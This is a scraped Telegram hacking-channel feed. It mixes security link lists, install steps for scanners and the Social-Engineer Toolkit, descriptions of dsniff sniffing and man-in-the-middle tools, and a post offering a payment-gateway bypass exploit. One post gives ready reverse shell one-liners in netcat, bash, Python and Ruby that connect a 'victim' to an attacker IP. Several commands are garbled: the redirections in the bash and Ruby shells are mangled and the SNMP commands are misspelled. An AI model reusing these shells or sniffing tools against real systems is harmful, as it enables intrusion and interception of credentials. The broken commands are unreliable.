UNDERCODE COMMUNITY
2.66K subscribers
1.23K photos
31 videos
2.65K files
79K links
๐Ÿฆ‘ Undercode Cyber World!
@UndercodeCommunity


1๏ธโƒฃ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2๏ธโƒฃ Cyber & Tech NEWS:
@Undercode_News

3๏ธโƒฃ CVE @Daily_CVE

โœจ Web & Services:
โ†’ Undercode.help
Download Telegram
๐Ÿฆ‘ HELPFULL BOTs For Telegram Users :
(from botListchat grp)

โ€ข๐Ÿ”Ž๐ŸŒInline Web Search - Busqueda Web en lรญnea
@ArcheWikiBot ๐Ÿ”Ž
@GoodReadsBooksBot
@GoogleDEBot ๐Ÿ”Ž
@GoogleSearchUnofficialBot ๐Ÿ”Ž
@GoogramBot ๐Ÿ”Ž
@HentaiDBot ๐Ÿ”Ž
@hotRedditBot ๐Ÿ”Ž
@inlinepixivbot
@inlineredditbot ๐Ÿ”Ž
@instant_utilities_bot
@itorrentsearchbot ๐Ÿ”Ž
@letmebot ๐Ÿ”Ž
@letmegbot ๐Ÿ”Ž
@lmddgtfybot ๐Ÿ”Ž
@NephoBot ๐Ÿ”Ž
@PHPFuncsBot ๐Ÿ”Ž
@PHPIndexBot ๐Ÿ”Ž
@podsearchbot ๐Ÿ”Ž
๐Ÿ†• @ribot ๐Ÿ”Ž
@TorrentSearchRoBot ๐Ÿ”Ž
@TubeListBot ๐Ÿ”Ž
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

#Social Engineering

* [Social Engineering Toolkit](https://github.com/trustedsec/social-engineer-toolkit)

* [Social Engineer Portal](https://www.social-engineer.org/)

* [7 Best social Engineering attack](http://www.darkreading.com/the-7-best-social-engineering-attacks-ever/d/d-id/1319411)

* [Using Social Engineering Tactics For Big Data Espionage - RSA Conference Europe 2012](https://www.rsaconference.com/writable/presentations/file_upload/das-301_williams_rader.pdf)

* [Weaponizing data science for social engineering: Automated E2E spear phishing on Twitter - Defcon 23](https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/DEFCON-24-Seymour-Tully-Weaponizing-Data-Science-For-Social-Engineering-WP.pdf)

* [OWASP Presentation of Social Engineering - OWASP](https://www.owasp.org/images/5/54/Presentation_Social_Engineering.pdf)

* [USB Drop Attacks: The Danger of รขโ‚ฌล“Lost And Foundรขโ‚ฌ Thumb Drives](https://www.redteamsecure.com/usb-drop-attacks-the-danger-of-lost-
and-found-thumb-drives/)

* [PyPhishing Toolkit](https://github.com/redteamsecurity/PyPhishing)

* [Best Time to send email](https://coschedule.com/blog/best-time-to-send-email/)

* [Phishing on Twitter - POT](https://www.kitploit.com/2018/02/pot-phishing-on-twitter.html)


> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
Forwarded from UNDERCODE SECURITY
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘#Threat Hunting Resources

# Platforms and Tools
- [MITRE ATT&CK](https://attack.mitre.org/wiki/Main_Page) - A curated knowledge base and model for cyber adversary behavior, reflecting the various phases of an adversaryโ€™s lifecycle and the platforms they are known to target.
- [MITRE CAR](https://car.mitre.org/wiki/Main_Page) - The Cyber Analytics Repository (CAR) is a knowledge base of analytics developed by MITRE based on the Adversary Tactics, Techniques, and Common Knowledge (ATT&CKโ„ข) adversary model.
- [MITRE ATT&CK Navigator](https://mitre.github.io/attack-navigator/enterprise/)([source code](https://github.com/mitre/attack-navigator)) - The ATT&CK Navigator is designed to provide basic navigation and annotation of ATT&CK matrices, something that people are already doing today in tools like Excel.
- [HELK](https://github.com/Cyb3rWard0g/HELK) - A Hunting ELK (Elasticsearch, Logstash, Kibana) with advanced analytic capabilities.
- [osquery](https://osquery.io/) - An operating system instrumentation framework for Windows, OS X (macOS), Linux, and FreeBSD. It exposes an operating system as a high-performance relational database.
- [osquery-configuration](https://github.com/palantir/osquery-configuration) - A repository for using osquery for incident detection and response.
- [DetectionLab](https://github.com/clong/DetectionLab/) - Vagrant & Packer scripts to build a lab environment complete with security tooling and logging best practices.
- [Sysmon-DFIR](https://github.com/MHaggis/sysmon-dfir) - Sources, configuration and how to detect evil things utilizing Microsoft Sysmon.
- [sysmon-config](https://github.com/SwiftOnSecurity/sysmon-config) - Sysmon configuration file template with default high-quality event tracing.
- [sysmon-modular](https://github.com/olafhartong/sysmon-modular) - A repository of sysmon configuration modules. It also includes a [mapping](https://github.com/olafhartong/sysmon-modular/blob/master/attack_matrix/README.md) of Sysmon configurations to MITRE ATT&CK techniques.
- [Revoke-Obfuscation](https://github.com/danielbohannon/Revoke-Obfuscation) - PowerShell Obfuscation Detection Framework.
- [Invoke-ATTACKAPI](https://github.com/Cyb3rWard0g/Invoke-ATTACKAPI) - A PowerShell script to interact with the MITRE ATT&CK Framework via its own API.
- [Unfetter](https://github.com/unfetter-analytic/unfetter) - A reference implementation provides a framework for collecting events (process creation, network connections, Window Event Logs, etc.) from a client machine and performing CAR analytics to detect potential adversary activity.
- [NOAH](https://github.com/giMini/NOAH) - PowerShell No Agent Hunting.
- [PSHunt](https://github.com/Infocyte/PSHunt) - Powershell Threat Hunting Module.
- [Flare](https://github.com/austin-taylor/flare) - An analytical framework for network traffic and behavioral analytics.
- [go-audit](https://github.com/slackhq/go-audit) - An alternative to the auditd daemon that ships with many distros.
- [sqhunter](https://github.com/0x4D31/sqhunter) - A simple threat hunting tool based on osquery, Salt Open and Cymon API.
- [Alerting and Detection Strategies Framework](https://github.com/palantir/alerting-detection-strategy-framework) - A framework for developing alerting and detection strategies.
- [A Simple Hunting Maturity Model](http://detect-respond.blogspot.com.au/2015/10/a-simple-hunting-maturity-model.html) - The Hunting Maturity Model describes five levels of organizational hunting capability, ranging from HMM0 (the least capability) to HMM4 (the most).
- [The Pyramic of Pain](http://detect-respond.blogspot.com.au/2013/03/the-pyramid-of-pain.html) - The relationship between the types of indicators you might use to detect an adversary's activities and how much pain it will cause them when you are able to deny those indicators to them.
- [A Framework for Cyber Threat Hunting](http://sqrrl.com/media/Framework-for-Threat-Hunting-Whitepaper.pdf)
- [The PARIS Model](http://threathunter.guru/blog/the-paris-model/) - A model for threat hunting.
Forwarded from UNDERCODE SECURITY
- [Cyber Kill Chain](https://www.lockheedmartin.com/us/what-we-do/aerospace-defense/cyber/cyber-kill-chain.html) - It is part of the Intelligence Driven Defenseยฎ model for identification and prevention of cyber intrusions activity. The model identifies what the adversaries must complete in order to achieve their objective.
- [The DML Model](http://ryanstillions.blogspot.com.au/2014/04/the-dml-model_21.html) - The Detection Maturity Level (DML) model is a capability maturity model for referencing ones maturity in detecting cyber attacks.
- [Endgame Hunt Cycle](http://pages.endgame.com/rs/627-YBU-612/images/Endgame%20Hunt%20Methodology%20POV%203.24.16.pdf)
- [NIST Cybersecurity Framework](https://www.nist.gov/cyberframework)
- [Sigma](https://github.com/Neo23x0/sigma) - Generic Signature Format for SIEM Systems



> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
Forwarded from UNDERCODE SECURITY
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ Most advanced XSS scanner 8k stars :

FEATURES :

Reflected and DOM XSS scanning
Multi-threaded crawling
Context analysis
Configurable core
WAF detection & evasion
Outdated JS lib scanning
Intelligent payload generator
Handmade HTML & JavaScript parser
Powerful fuzzing engine
Blind XSS support
Highly researched work-flow
Complete HTTP support
Bruteforce payloads from a file
Powered by Photon, Zetanize and Arjun
Payload Encoding

๐Ÿฆ‘Os :

> debians (kali-parrot-ubuntu...)

๐Ÿ„ธ๐Ÿ„ฝ๐Ÿ…‚๐Ÿ…ƒ๐Ÿ„ฐ๐Ÿ„ป๐Ÿ„ป๐Ÿ„ธ๐Ÿ…‚๐Ÿ„ฐ๐Ÿ…ƒ๐Ÿ„ธ๐Ÿ„พ๐Ÿ„ฝ & ๐Ÿ…๐Ÿ…„๐Ÿ„ฝ :

1๏ธโƒฃgit clone https://github.com/s0md3v/XSStrike

2๏ธโƒฃcd XSStrike

2๏ธโƒฃpython xsstrike.py [-h] [-u TARGET] [--data DATA] [-t THREADS] [--seeds SEEDS] [--json] [--path]
[--fuzzer] [--update] [--timeout] [--params] [--crawl] [--blind]
[--skip-dom] [--headers] [--proxy] [-d DELAY] [-e ENCODING]


MORE USAGES :

4๏ธโƒฃScan
a single URL
Option: -u or --url

5๏ธโƒฃTest a single webpage which uses GET method.

python xsstrike.py -u "http://example.com/search.php?q=query"

6๏ธโƒฃSupplying POST data
python xsstrike.py -u "http://example.com/search.php" --data "q=query"

7๏ธโƒฃTesting URL path components
Option: --path

8๏ธโƒฃWant to inject payloads in the URL path like http://example.com/search/<payload>, you can do that with --path switch.

python xsstrike.py -u "http://example.com/search/form/query" --path

9๏ธโƒฃTreat POST data as JSON
Option: --json

This switch can be used to test JSON data via POST method.

python xsstrike.py -u "http://example.com/search.php" --data '{"q":"query"} --json'

๐Ÿ”ŸCrawling
Option: --crawl

For more type -h
โœ…
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘#5G Cellular Attacks

- [ENISA THREAT LANDSCAPE FOR 5G NETWORKS](https://github.com/W00t3k/Awesome-CellularHacking/blob/master/ENISA%20threat%20landscape%20for%205G%20Networks.pdf)

- [Protecting the 4G and 5G Cellular PagingProtocols against Security and Privacy Attacks](https://www.degruyter.com/downloadpdf/j/popets.2020.2020.issue-1/popets-2020-0008/popets-2020-0008.pdf)

- [Insecure Connection Bootstrapping in Cellular Networks: The Root of All Evil](https://relentless-warrior.github.io/wp-content/uploads/2019/05/wisec19-preprint.pdf)

- [5GReasoner: A Property-Directed Security and Privacy Analysis Framework for 5G Cellular Network Protocol](https://relentless-warrior.github.io/wp-content/uploads/2019/10/5GReasoner.pdf)

- [QCSniper - A tool For capture 2g-4g air traffic using qualcomm phones ](https://labs.p1sec.com/2019/07/09/presenting-qcsuper-a-tool-for-capturing-your-2g-3g-4g-air-traffic-on-qualcomm-based-phones/)

- [Privacy Attacks to the 4G and 5G Cellular Paging Protocols Using Side Channel Information](http://homepage.divms.uiowa.edu/~comarhaider/publications/LTE-torpedo-NDSS19.pdf)

- [New Privacy Threat on 3G, 4G, and Upcoming 5G AKA Protocols ](https://arxiv.org/pdf/1905.07617.pdf)

- [New Vulnerabilities in 5G Networks](https://threatpost.com/5g-security-flaw-mitm-targeted-attacks/147073/)

- [Side Channel Analysis in 4G and 5G Cellular Networks](https://i.blackhat.com/eu-19/Thursday/eu-19-Hussain-Side-Channel-Attacks-In-4G-And-5G-Cellular-Networks.pdf)

- [5G NR Jamming, Spoofing, and Sniffing](https://github.com/W00t3k/Awesome-Cellular-Hacking/blob/master/5gjam.pdf)

> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘#DNS Reconnassaince :

1๏ธโƒฃDNSRECON
* [dnsrecon](https://github.com/darkoperator/dnsrecon) - DNS Enumeration Script created by Carlos Perez (darkoperator)

2๏ธโƒฃReverse lookup for IP range:
./dnsrecon.rb -t rvs -i 10.1.1.1,10.1.1.50

3๏ธโƒฃRetrieve standard DNS records:
./dnsrecon.rb -t std -d example.com

4๏ธโƒฃEnumerate subdornains:
./dnsrecon.rb -t brt -d example.com -w hosts.txt

5๏ธโƒฃDNS zone transfer:
./dnsrecon -d example.com -t axfr


6๏ธโƒฃParsing NMAP Reverse DNS Lookup

> nmap -R -sL -Pn -dns-servers dns svr ip range | awk '{if( ($1" "$2" "$3)=="NMAP scan report")print$5" "$6}' | sed 's/(//g' | sed 's/)//g' dns.txt

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘#Netcat Linux Reverse Shell :

1๏ธโƒฃnc 10.10.10.10 888 -e /bin/sh
10.10.10.10 is the IP address of the machine you want the victim to connect to.
888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it).

2๏ธโƒฃ Netcat Linux Reverse Shell
nc 10.10.10.10 888 -e cmd.exe
10.10.10.10 is the IP address of the machine you want the victim to connect to.
888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it).

3๏ธโƒฃ Using Bash
bash -i & /dev/tcp/10.10.10.10/888 0 &1

4๏ธโƒฃ Using Python
python -c 'import socket, subprocess, os; s=socket. socket (socket.AF_INET, socket.SOCK_STREAM); s.connect(("10.10.10.10",888)); os.dup2(s.fileno(),0); os.dup2(s.fileno(l,1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'

5๏ธโƒฃ Using Ruby
ruby -rsocket -e'f=TCPSocket.open("10.10.10.10",888).to_i; exec sprintf("/bin/sh -i &%d &%d 2 &%d",f,f,f)'

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

#Useful SNMP Commands

1๏ธโƒฃSearch for Windows installed software
smpwalk !grep hrSWinstalledName

2๏ธโƒฃ Search for Windows users
snmpwalk ip 1.3 lgrep --.1.2.25 -f4

3๏ธโƒฃ Search for Windows running services
snrnpwalk -c public -v1 ip 1 lgrep hrSWRJnName !cut -d" " -f4

4๏ธโƒฃ Search for Windows open TCP ports
smpwalk lgrep tcpConnState !cut -d" " -f6 !sort -u


> git sources
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘2020 updated web server scanner :

๐Ÿ„ธ๐Ÿ„ฝ๐Ÿ…‚๐Ÿ…ƒ๐Ÿ„ฐ๐Ÿ„ป๐Ÿ„ป๐Ÿ„ธ๐Ÿ…‚๐Ÿ„ฐ๐Ÿ…ƒ๐Ÿ„ธ๐Ÿ„พ๐Ÿ„ฝ & ๐Ÿ…๐Ÿ…„๐Ÿ„ฝ :


1๏ธโƒฃgit clone https://github.com/sullo/nikto
# Main script is in program/

2๏ธโƒฃcd nikto/program
# Run using the shebang interpreter

3๏ธโƒฃ./nikto.pl -h http://www.example.com
# Run using perl (if you forget to chmod)

4๏ธโƒฃperl nikto.pl -h http://www.example.com

๐Ÿฆ‘Run as a Docker container:

1๏ธโƒฃgit clone https://github.com/sullo/nikto.git

2๏ธโƒฃcd nikto

3๏ธโƒฃdocker build -t sullo/nikto .
# Call it without arguments to display the full help

4๏ธโƒฃdocker run --rm sullo/nikto
# Basic usage

5๏ธโƒฃdocker run --rm sullo/nikto -h http://www.example.com
# To save the report in a specific format, mount /tmp as a volume:

6๏ธโƒฃdocker run --rm -v $(pwd):/tmp sullo/nikto -h http://www.example.com -o /tmp/out.json

โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

important hackers terms :

1๏ธโƒฃarpspoof
redirect packets from a target host (or all hosts) on the LAN
intended for another local host by forging ARP replies. this
is an extremely effective way of sniffing traffic on a switch.
kernel IP forwarding (or a userland program which accomplishes
the same, e.g. fragroute ๐Ÿ˜„must be turned on ahead of time.

2๏ธโƒฃdnsspoof
forge replies to arbitrary DNS address / pointer queries on
the LAN. this is useful in bypassing hostname-based access
controls, or in implementing a variety of man-in-the-middle
attacks (HTTP, HTTPS, SSH, Kerberos, etc).

3๏ธโƒฃdsniff
password sniffer. handles FTP, Telnet, SMTP, HTTP, POP,
poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP
MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ,
Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec
pcAnywhere, NAI Sniffer, Microsoft SMB, Oracle SQL,Net, Sybase
and Microsoft SQL auth info.

4๏ธโƒฃ dsniff automatically detects and minimally parses each
application protocol, only saving the interesting bits, and
uses Berkeley DB as its output file format, only logging
unique authentication attempts. full TCP/IP reassembly is
provided by libnids(3) (likewise for the following tools as
well).

5๏ธโƒฃfilesnarf
saves selected files sniffed from NFS traffic in the current
working directory.

6๏ธโƒฃmacof
flood the local network with random MAC addresses (causing
some switches to fail open in repeating mode, facilitating
sniffing). a straight C port of the original Perl Net::RawIP
macof program.

7๏ธโƒฃmailsnarf
a fast and easy way to violate the Electronic Communications
Privacy Act of 1986 (18 USC 2701-2711), be careful. outputs
selected messages sniffed from SMTP and POP traffic in Berkeley
mbox format, suitable for offline browsing with your favorite
mail reader (mail -f, pine, etc.).

8๏ธโƒฃmsgsnarf
record selected messages from sniffed AOL Instant Messenger,
ICQ 2000, IRC, and Yahoo! Messenger chat sessions.

9๏ธโƒฃsshmitm
SSH monkey-in-the-middle. proxies and sniffs SSH traffic
redirected by dnsspoof(8), capturing SSH password logins, and
optionally hijacking interactive sessions. only SSH protocol
version 1 is (or ever will be) supported - this program is far
too evil already.

๐Ÿ”Ÿsshow
SSH traffic analysis tool. analyzes encrypted SSH-1 and SSH-2
traffic, identifying authentication attempts, the lengths of
passwords entered in interactive sessions, and command line
lengths.

1๏ธโƒฃ1๏ธโƒฃtcpkill
kills specified in-progress TCP connections (useful for
libnids-based applications which require a full TCP 3-whs for
TCB creation).

1๏ธโƒฃ2๏ธโƒฃtcpnice
slow down specified TCP connections via "active" traffic
shaping. forges tiny TCP window advertisements, and optionally

ICMP source quench replies.

1๏ธโƒฃ3๏ธโƒฃurlsnarf
output selected URLs sniffed from HTTP traffic in CLF
(Common Log Format, used by almost all web servers), suitable
for offline post-processing with your favorite web log
analysis tool (analog, wwwstat, etc.).

1๏ธโƒฃ4๏ธโƒฃwebmitm
HTTP / HTTPS monkey-in-the-middle. transparently proxies and
sniffs web traffic redirected by dnsspoof(8), capturing most
"secure" SSL-encrypted webmail logins and form submissions.

1๏ธโƒฃ5๏ธโƒฃwebspy
sends URLs sniffed from a client to your local Netscape
browser for display, updated in real-time (as the target
surfs, your browser surfs along with them, automagically).
a fun party trick.

> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Social-Engineer Toolkit 2020 updated :

๐Ÿ„ธ๐Ÿ„ฝ๐Ÿ…‚๐Ÿ…ƒ๐Ÿ„ฐ๐Ÿ„ป๐Ÿ„ป๐Ÿ„ธ๐Ÿ…‚๐Ÿ„ฐ๐Ÿ…ƒ๐Ÿ„ธ๐Ÿ„พ๐Ÿ„ฝ & ๐Ÿ…๐Ÿ…„๐Ÿ„ฝ :

1๏ธโƒฃgit clone https://github.com/trustedsec/social-engineer-

2๏ธโƒฃtoolkit/ setoolkit/

3๏ธโƒฃcd setoolkit

4๏ธโƒฃpip3 install -r requirements.txt

5๏ธโƒฃpython setup.py

๐Ÿฆ‘OS :

> Linux
>Mac OS X (experimental)

6๏ธโƒฃFull usage see this pdf-if you beginer :
> https://github.com/trustedsec/social-engineer-toolkit/raw/master/readme/User_Manual.pdf


@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘A Java based HTTP/HTTPS proxy

> for assessing web application vulnerability.

>It supports editing/viewing HTTP messages on-the-fly. Other featuers include spiders, client certificate, proxy-chaining, intelligent scanning for XSS and SQL injections etc.

 for Windows-Linux-Mac :

> https://sourceforge.net/projects/paros/files/latest/download

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘What this โ˜ ๏ธ project can do in hacking ?

> Download :

https://wiki.owasp.org/index.php/Category:OWASP_WebScarab_Project

FEATURES :

>Fragments
- extracts Scripts and HTML comments from HTML pages as they are seen via the proxy, or other plugins

>Proxy - observes traffic between the browser and the web server. The WebScarab proxy is able to observe both HTTP and encrypted HTTPS traffic, by negotiating an SSL connection between WebScarab and the browser instead of simply connecting the browser to the server and allowing an encrypted stream to pass through it. Various proxy plugins have also been developed to allow the operator to control the requests and responses that pass through the proxy.

> Manual intercept - allows the user to modify HTTP and HTTPS requests and responses on the fly, before they reach the server or browser.

>Beanshell - allows for the execution of arbitrarily complex operations on requests and responses. Anything that can be expressed in Java can be executed.

>Reveal hidden fields - sometimes it is easier to modify a hidden field in the page itself, rather than intercepting the request after it has been sent. This plugin simply changes all hidden fields found in HTML pages to text fields, making them visible, and editable.
Bandwidth simulator - allows the user to emulate a slower network, in order to observe how their website would perform when accessed over, say, a modem.

>Spider - identifies new URLs on the target site, and fetches them on command.

>Manual request - Allows editing and replay of previous requests, or creation of entirely new requests.
SessionID analysis - collects and analyzes a number of cookies to visually determine the degree of randomness and unpredictability. Note that this analysis is rather trivial, and does not do any serious checks, such as FIPS, etc.

>Scripted - operators can use BeanShell (or any other BSF supported language found on the classpath) to write a script to create requests and fetch them from the server. The script can then perform some analysis on the responses, with all the power of the WebScarab Request and Response object model to simplify things.

>Parameter fuzzer - performs automated substitution of parameter values that are likely to expose incomplete parameter validation, leading to vulnerabilities like Cross Site Scripting (XSS) and SQL Injection.

>Search - allows the user to craft arbitrary BeanShell expressions to identify conversations that should be shown in the list.
Compare - calculates the edit distance between the response bodies of the conversations observed, and a selected baseline conversation. The edit distance is "the number of edits required to transform one document into another". For performance reasons, edits are calculated using word tokens, rather than byte by byte.

>SOAP - There is a plugin that parses WSDL, and presents the various functions and the required parameters, allowing them to be edited before being sent to the server. NOTE: This plugin is deprecated, and may be removed in the future. SOAPUI is streets beyond anything that Webscarab can do, or will ever do, and is

>Extensions - automates checks for files that were mistakenly left in web server's root directory (e.g. .bak, ~, etc). Checks are performed for both, files and directories (e.g. /app/login.jsp will be checked for /app/login.jsp.bak, /app/login.jsp~, /app.zip, /app.tar.gz, etc). Extensions for files and directories can be edited by user.

>XSS/CRLF - passive analysis plugin that searches for user-controlled data in HTTP response headers and body to identify potential CRLF injection (HTTP response splitting) and reflected cross-site scripting (XSS) vulnerabilities.

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
Forwarded from UNDERCODE SECURITY
Magento_WooCommerce_CardGate_Payment_Gateway_2_0_30_Payment_Process.php
6.5 KB
Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘#Vulnerable Servers :

> There are a series of vulnerable web applications that you can use to practice your skills in a safe environment. You can get more information about them in the [vulnerable_servers directory in this repository](https://github.com/The-Art-of-Hacking/art-of-hacking/tree/master/vulnerable_servers).

#How to Integrate OWASP ZAP with Jenkins :

-You can integrate ZAP with Jenkins and even automatically create Jira issues based on your findings. You can download the [ZAP plug in here](https://wiki.jenkins.io/display/JENKINS/zap+plugin).

-[This video](https://www.youtube.com/watch?v=mmHZLSffCUg) provides an overview of how to integrate


#Docker Security

- [OWASP Docker security resources](https://github.com/OWASP/Docker-Security)

- [Docker Bench for Security](https://github.com/docker/docker-bench-security)

- [Dockerscan](https://github.com/cr0hn/dockerscan)

- [Docker Security Playground](https://github.com/giper45/DockerSecurityPlayground)

#Javascript Tools :

* [Retire.js](https://retirejs.github.io/retire.js)

>git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–